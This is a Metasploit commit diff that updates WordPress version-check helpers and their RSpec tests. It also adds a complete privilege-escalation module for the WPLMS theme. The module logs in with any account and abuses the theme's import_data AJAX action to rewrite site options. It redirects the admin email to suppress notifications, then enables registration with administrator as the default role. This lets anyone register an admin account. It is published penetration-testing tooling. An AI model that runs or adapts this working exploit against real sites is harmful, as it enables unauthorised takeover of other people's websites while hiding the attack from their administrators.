Land rapid7#4789, @rastating WPLMS wordpress module

Author: firefart

lib/msf/http/wordpress/version.rb

@@ -43,22 +43,42 @@ def wordpress_version
   # Checks a readme for a vulnerable version
   #
   # @param [String] plugin_name The name of the plugin
-  # @param [String] fixed_version The version the vulnerability was fixed in
+  # @param [String] fixed_version Optional, the version the vulnerability was fixed in
   # @param [String] vuln_introduced_version Optional, the version the vulnerability was introduced
   #
   # @return [ Msf::Exploit::CheckCode ]
-  def check_plugin_version_from_readme(plugin_name, fixed_version, vuln_introduced_version = nil)
+  def check_plugin_version_from_readme(plugin_name, fixed_version = nil, vuln_introduced_version = nil)
     check_version_from_readme(:plugin, plugin_name, fixed_version, vuln_introduced_version)
   end
 
+  # Checks the style.css file for a vulnerable version
+  #
+  # @param [String] theme_name The name of the theme
+  # @param [String] fixed_version Optional, the version the vulnerability was fixed in
+  # @param [String] vuln_introduced_version Optional, the version the vulnerability was introduced
+  #
+  # @return [ Msf::Exploit::CheckCode ]
+  def check_theme_version_from_style(theme_name, fixed_version = nil, vuln_introduced_version = nil)
+    style_uri = normalize_uri(wordpress_url_themes, theme_name, 'style.css')
+    res = send_request_cgi(
+      'uri'    => style_uri,
+      'method' => 'GET'
+    )
+
+    # No style.css file present
+    return Msf::Exploit::CheckCode::Unknown if res.nil? || res.code != 200
+
+    return extract_and_check_version(res.body.to_s, :style, :theme, fixed_version, vuln_introduced_version)
+  end
+
   # Checks a readme for a vulnerable version
   #
   # @param [String] theme_name The name of the theme
-  # @param [String] fixed_version The version the vulnerability was fixed in
+  # @param [String] fixed_version Optional, the version the vulnerability was fixed in
   # @param [String] vuln_introduced_version Optional, the version the vulnerability was introduced
   #
   # @return [ Msf::Exploit::CheckCode ]
-  def check_theme_version_from_readme(theme_name, fixed_version, vuln_introduced_version = nil)
+  def check_theme_version_from_readme(theme_name, fixed_version = nil, vuln_introduced_version = nil)
     check_version_from_readme(:theme, theme_name, fixed_version, vuln_introduced_version)
   end
 
@@ -77,7 +97,7 @@ def wordpress_version_helper(url, regex)
     nil
   end
 
-  def check_version_from_readme(type, name, fixed_version, vuln_introduced_version = nil)
+  def check_version_from_readme(type, name, fixed_version = nil, vuln_introduced_version = nil)
     case type
     when :plugin
       folder = 'plugins'
@@ -99,36 +119,73 @@ def check_version_from_readme(type, name, fixed_version, vuln_introduced_version
         'uri'    => readme_url,
         'method' => 'GET'
       )
+    end
 
-      # no Readme.txt present
-      return Msf::Exploit::CheckCode::Unknown if res.nil? || res.code != 200
+    if res.nil? || res.code != 200
+      # No readme.txt or Readme.txt present for plugin
+      return Msf::Exploit::CheckCode::Unknown if type == :plugin
+
+      # Try again using the style.css file
+      return check_theme_version_from_style(name, fixed_version, vuln_introduced_version) if type == :theme
+    end
+
+    version_res = extract_and_check_version(res.body.to_s, :readme, type, fixed_version, vuln_introduced_version)
+    if version_res == Msf::Exploit::CheckCode::Detected && type == :theme
+      # If no version could be found in readme.txt for a theme, try style.css
+      return check_theme_version_from_style(name, fixed_version, vuln_introduced_version)
+    else
+      return version_res
     end
+  end
 
-    # try to extract version from readme
-    # Example line:
-    # Stable tag: 2.6.6
-    version = res.body.to_s[/(?:stable tag|version):\s*(?!trunk)([0-9a-z.-]+)/i, 1]
+  def extract_and_check_version(body, type, item_type, fixed_version = nil, vuln_introduced_version = nil)
+    case type
+    when :readme
+      # Try to extract version from readme
+      # Example line:
+      # Stable tag: 2.6.6
+      version = body[/(?:stable tag|version):\s*(?!trunk)([0-9a-z.-]+)/i, 1]
+    when :style
+      # Try to extract version from style.css
+      # Example line:
+      # Version: 1.5.2
+      version = body[/(?:Version):\s*([0-9a-z.-]+)/i, 1]
+    else
+      fail("Unknown file type #{type}")
+    end
 
-    # readme present, but no version number
+    # Could not identify version number
     return Msf::Exploit::CheckCode::Detected if version.nil?
 
-    vprint_status("#{peer} - Found version #{version} of the #{type}")
+    vprint_status("#{peer} - Found version #{version} of the #{item_type}")
 
-    # Version older than fixed version
-    if Gem::Version.new(version) < Gem::Version.new(fixed_version)
+    if fixed_version.nil?
       if vuln_introduced_version.nil?
         # All versions are vulnerable
         return Msf::Exploit::CheckCode::Appears
-      # vuln_introduced_version provided, check if version is newer
       elsif Gem::Version.new(version) >= Gem::Version.new(vuln_introduced_version)
+        # Newer or equal to the version it was introduced
         return Msf::Exploit::CheckCode::Appears
       else
-        # Not in range, nut vulnerable
         return Msf::Exploit::CheckCode::Safe
       end
-    # version newer than fixed version
     else
-      return Msf::Exploit::CheckCode::Safe
+      # Version older than fixed version
+      if Gem::Version.new(version) < Gem::Version.new(fixed_version)
+        if vuln_introduced_version.nil?
+          # All versions are vulnerable
+          return Msf::Exploit::CheckCode::Appears
+        # vuln_introduced_version provided, check if version is newer
+        elsif Gem::Version.new(version) >= Gem::Version.new(vuln_introduced_version)
+          return Msf::Exploit::CheckCode::Appears
+        else
+          # Not in range, nut vulnerable
+          return Msf::Exploit::CheckCode::Safe
+        end
+      # version newer than fixed version
+      else
+        return Msf::Exploit::CheckCode::Safe
+      end
     end
   end
 end

modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb

@@ -0,0 +1,124 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress WPLMS Theme Privilege Escalation',
+      'Description'     => %q{
+          The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows authenticated users of
+          any user level to set any system option via a lack of validation in the import_data function
+          of /includes/func.php.
+
+          The module first changes the admin e-mail address to prevent any
+          notifications being sent to the actual administrator during the attack, re-enables user
+          registration in case it has been disabled and sets the default role to be administrator.
+          This will allow for the user to create a new account with admin privileges via the default
+          registration page found at /wp-login.php?action=register.
+      },
+      'Author'          =>
+        [
+          'Evex',                             # Vulnerability discovery
+          'Rob Carr <rob[at]rastating.com>'   # Metasploit module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          ['WPVDB', '7785']
+        ],
+      'DisclosureDate'  => 'Feb 09 2015'
+      ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
+        OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
+      ], self.class)
+  end
+
+  def check
+    check_theme_version_from_readme('wplms', '1.8.4.2', '1.5.2')
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def php_serialize(value)
+    # Only strings and numbers are required by this module
+    case value
+    when String, Symbol
+      "s:#{value.bytesize}:\"#{value}\";"
+    when Fixnum
+      "i:#{value};"
+    end
+  end
+
+  def serialize_and_encode(value)
+    serialized_value = php_serialize(value)
+    unless serialized_value.nil?
+      Rex::Text.encode_base64(serialized_value)
+    end
+  end
+
+  def set_wp_option(name, value, cookie)
+    encoded_value = serialize_and_encode(value)
+    if encoded_value.nil?
+      vprint_error("#{peer} - Failed to serialize #{value}.")
+    else
+      res = send_request_cgi(
+        'method'    => 'POST',
+        'uri'       => wordpress_url_admin_ajax,
+        'vars_get'  => { 'action' => 'import_data' },
+        'vars_post' => { 'name' => name, 'code' => encoded_value },
+        'cookie'    => cookie
+      )
+
+      if res.nil?
+        vprint_error("#{peer} - No response from the target.")
+      else
+        vprint_warning("#{peer} - Server responded with status code #{res.code}") if res.code != 200
+      end
+
+      return res
+    end
+  end
+
+  def run
+    print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...")
+    cookie = wordpress_login(username, password)
+    fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
+    print_good("#{peer} - Authenticated with WordPress")
+
+    new_email = "#{Rex::Text.rand_text_alpha(5)}@#{Rex::Text.rand_text_alpha(5)}.com"
+    print_status("#{peer} - Changing admin e-mail address to #{new_email}...")
+    if set_wp_option('admin_email', new_email, cookie).nil?
+      fail_with(Failure::UnexpectedReply, 'Failed to change the admin e-mail address')
+    end
+
+    print_status("#{peer} - Enabling user registrations...")
+    if set_wp_option('users_can_register', 1, cookie).nil?
+      fail_with(Failure::UnexpectedReply, 'Failed to enable user registrations')
+    end
+
+    print_status("#{peer} - Setting the default user role...")
+    if set_wp_option('default_role', 'administrator', cookie).nil?
+      fail_with(Failure::UnexpectedReply, 'Failed to set the default user role')
+    end
+
+    register_url = normalize_uri(target_uri.path, 'wp-login.php?action=register')
+    print_good("#{peer} - Privilege escalation complete")
+    print_good("#{peer} - Create a new account at #{register_url} to gain admin access.")
+  end
+end

spec/lib/msf/http/wordpress/version_spec.rb

@@ -145,6 +145,97 @@
       it { expect(subject.send(:check_version_from_readme, :plugin, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Safe) }
     end
 
+    context 'when all versions are vulnerable' do
+      let(:wp_code) { 200 }
+      let(:wp_body) { 'Stable tag: 1.0.0' }
+      it { expect(subject.send(:check_version_from_readme, :plugin, 'name')).to be(Msf::Exploit::CheckCode::Appears) }
+    end
+  end
+
+  describe '#check_theme_version_from_style' do
+    before :each do
+      allow(subject).to receive(:send_request_cgi) do |opts|
+        res = Rex::Proto::Http::Response.new
+        res.code = wp_code
+        res.body = wp_body
+        res
+      end
+    end
+
+    let(:wp_code) { 200 }
+    let(:wp_body) { nil }
+    let(:wp_fixed_version) { nil }
+
+    context 'when no style is found' do
+      let(:wp_code) { 404 }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Unknown) }
+    end
+
+    context 'when no version can be extracted from style' do
+      let(:wp_code) { 200 }
+      let(:wp_body) { 'invalid content' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Detected) }
+    end
+
+    context 'when version from style has arbitrary leading whitespace' do
+      let(:wp_code) { 200 }
+      let(:wp_fixed_version) { '1.0.1' }
+      let(:wp_body) { 'Version:  1.0.0' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Appears) }
+      let(:wp_body) { 'Version:1.0.0' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Appears) }
+    end
+
+    context 'when installed version is vulnerable' do
+      let(:wp_code) { 200 }
+      let(:wp_fixed_version) { '1.0.1' }
+      let(:wp_body) { 'Version: 1.0.0' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Appears) }
+    end
+
+    context 'when installed version is not vulnerable' do
+      let(:wp_code) { 200 }
+      let(:wp_fixed_version) { '1.0.1' }
+      let(:wp_body) { 'Version: 1.0.2' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Safe) }
+    end
+
+    context 'when installed version is vulnerable (version range)' do
+      let(:wp_code) { 200 }
+      let(:wp_fixed_version) { '1.0.2' }
+      let(:wp_introd_version) { '1.0.0' }
+      let(:wp_body) { 'Version: 1.0.1' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version, wp_introd_version)).to be(Msf::Exploit::CheckCode::Appears) }
+    end
+
+    context 'when installed version is older (version range)' do
+      let(:wp_code) { 200 }
+      let(:wp_fixed_version) { '1.0.1' }
+      let(:wp_introd_version) { '1.0.0' }
+      let(:wp_body) { 'Version: 0.0.9' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version, wp_introd_version)).to be(Msf::Exploit::CheckCode::Safe) }
+    end
+
+    context 'when installed version is newer (version range)' do
+      let(:wp_code) { 200 }
+      let(:wp_fixed_version) { '1.0.1' }
+      let(:wp_introd_version) { '1.0.0' }
+      let(:wp_body) { 'Version: 1.0.2' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version, wp_introd_version)).to be(Msf::Exploit::CheckCode::Safe) }
+    end
+
+    context 'when installed version is newer (text in version number)' do
+      let(:wp_code) { 200 }
+      let(:wp_fixed_version) { '1.5.3' }
+      let(:wp_body) { 'Version: 2.0.0-beta1' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name', wp_fixed_version)).to be(Msf::Exploit::CheckCode::Safe) }
+    end
+
+    context 'when all versions are vulnerable' do
+      let(:wp_code) { 200 }
+      let(:wp_body) { 'Version: 1.0.0' }
+      it { expect(subject.send(:check_theme_version_from_style, 'name')).to be(Msf::Exploit::CheckCode::Appears) }
+    end
   end
 
 end